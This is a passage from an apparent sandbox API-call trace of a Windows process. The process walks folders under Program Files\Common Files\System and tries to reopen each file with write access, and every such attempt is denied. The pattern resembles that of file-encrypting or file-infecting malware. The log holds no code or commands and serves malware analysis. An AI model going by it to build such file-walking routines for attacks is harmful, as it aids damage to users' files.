Flags=0x0, Size=0x14) returned 0x34f10 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b078 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0088.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0088.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0088.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0088.332] AreFileApisANSI () returned 1 [0088.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui", lpUsedDefaultChar=0x0) returned 60 [0088.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0088.332] AreFileApisANSI () returned 1 [0088.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0088.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0088.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui") returned 60 [0088.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0088.333] GetFileType (hFile=0x368) returned 0x1 [0088.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0088.333] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.333] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.334] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.334] CloseHandle (hObject=0x368) returned 1 [0088.334] AreFileApisANSI () returned 1 [0088.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0088.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0088.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui") returned 60 [0088.334] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.334] GetLastError () returned 0x5 [0088.334] GetLastError () returned 0x5 [0088.334] SetLastError (dwErrCode=0x5) [0088.334] GetLastError () returned 0x5 [0088.334] SetLastError (dwErrCode=0x5) [0088.334] GetLastError () returned 0x5 [0088.334] SetLastError (dwErrCode=0x5) [0088.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0088.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.335] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x76, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6e038, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x76, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="n-", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓瀀\x01⺊Ā")) returned 0 [0088.335] FindClose (in: hFindFile=0x78750 | out: hFindFile=0x78750) returned 1 [0088.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0088.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0088.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0088.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0088.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0088.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0088.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a4b0 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0088.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0088.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0088.335] AreFileApisANSI () returned 1 [0088.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc", lpUsedDefaultChar=0x0) returned 43 [0088.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0088.336] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.336] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0088.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0088.336] AreFileApisANSI () returned 1 [0088.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0088.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x670c0 [0088.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x670c0, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc") returned 43 [0088.336] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc" (normalized: "c:\\program files\\common files\\system\\msadc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.336] GetLastError () returned 0x5 [0088.336] GetLastError () returned 0x5 [0088.336] SetLastError (dwErrCode=0x5) [0088.336] GetLastError () returned 0x5 [0088.336] SetLastError (dwErrCode=0x5) [0088.336] GetLastError () returned 0x5 [0088.336] SetLastError (dwErrCode=0x5) [0088.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x670c0 | out: hHeap=0x20000) returned 1 [0088.336] AreFileApisANSI () returned 1 [0088.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0088.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67a20 [0088.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc") returned 43 [0088.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc" (normalized: "c:\\program files\\common files\\system\\msadc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.337] GetLastError () returned 0x5 [0088.337] GetLastError () returned 0x5 [0088.337] SetLastError (dwErrCode=0x5) [0088.337] GetLastError () returned 0x5 [0088.337] SetLastError (dwErrCode=0x5) [0088.337] GetLastError () returned 0x5 [0088.337] SetLastError (dwErrCode=0x5) [0088.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0088.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0088.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0088.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0088.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0088.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0088.337] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d8186d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0088.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0088.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0088.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0088.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0088.337] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78310 [0088.347] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d7f179, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.347] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x276, dwReserved0=0x0, dwReserved1=0x0, cFileName="adcjavas.inc", cAlternateFileName="")) returned 1 [0088.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0088.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0088.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0088.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0088.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0088.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0088.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0088.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0088.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0088.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8afe0 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0088.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0088.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.348] AreFileApisANSI () returned 1 [0088.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc", lpUsedDefaultChar=0x0) returned 56 [0088.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0088.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.349] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0088.349] AreFileApisANSI () returned 1 [0088.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0088.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 56 [0088.349] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.521] GetFileType (hFile=0x348) returned 0x1 [0088.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0088.521] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.521] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.521] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.522] CloseHandle (hObject=0x348) returned 1 [0088.522] AreFileApisANSI () returned 1 [0088.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0088.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 56 [0088.522] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.522] GetLastError () returned 0x5 [0088.522] GetLastError () returned 0x5 [0088.522] SetLastError (dwErrCode=0x5) [0088.522] GetLastError () returned 0x5 [0088.522] SetLastError (dwErrCode=0x5) [0088.522] GetLastError () returned 0x5 [0088.522] SetLastError (dwErrCode=0x5) [0088.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0088.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.522] HeapFree (in: 